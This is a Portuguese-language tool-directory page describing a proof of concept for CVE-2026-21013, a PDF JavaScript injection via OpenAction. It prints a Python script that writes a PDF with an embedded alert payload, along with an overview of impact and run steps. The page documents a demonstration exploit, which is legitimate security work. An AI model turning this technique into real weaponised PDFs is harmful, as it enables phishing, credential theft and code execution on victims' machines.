Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — Gera um PDF com JavaScript embutido para demonstrar o CVE-2026-21013, uma injeção de OpenAction que leva à execução de scripts em leitores de PDF vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança Web
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

Gera um PDF com JavaScript embutido para demonstrar o CVE-2026-21013, uma injeção de OpenAction que leva à execução de scripts em leitores de PDF vulneráveis.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
2há 1 mêsAinda não revisado
Compartilhar

CVE-2026-21013 – Injeção de JavaScript em PDF via Script Incorporado

Código do Programa (Python gerando PDF malicioso)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – Injeção de JavaScript em PDF via OpenAction

Severity: Medium

Visão Geral

Um gerador de PDF não sanitiza o conteúdo fornecido pelo usuário antes de incorporá-lo no arquivo PDF. Um invasor pode injetar uma entrada de JavaScript que é executada quando o documento é aberto, levando a cross-site scripting (em visualizadores web) ou execução local de código (em leitores de desktop com suporte completo a JS).

/OpenAction

Detalhes da Vulnerabilidade

  • Tipo: Injeção em PDF / Execução de Código no Lado do Cliente
  • Impacto: Phishing, roubo de credenciais, distribuição de malware.
  • Causa Raiz: A biblioteca PDF incorpora diretamente strings controladas pelo invasor na estrutura do PDF, sem escape ou validação.

Demonstração do Exploit

Execute o gerador:

root@kitploit:~
python generate_pdf_js_inject.py

Abra o malicious.pdf resultante em um leitor de PDF que suporte JavaScript; uma caixa de alerta aparecerá.

Baixar ferramenta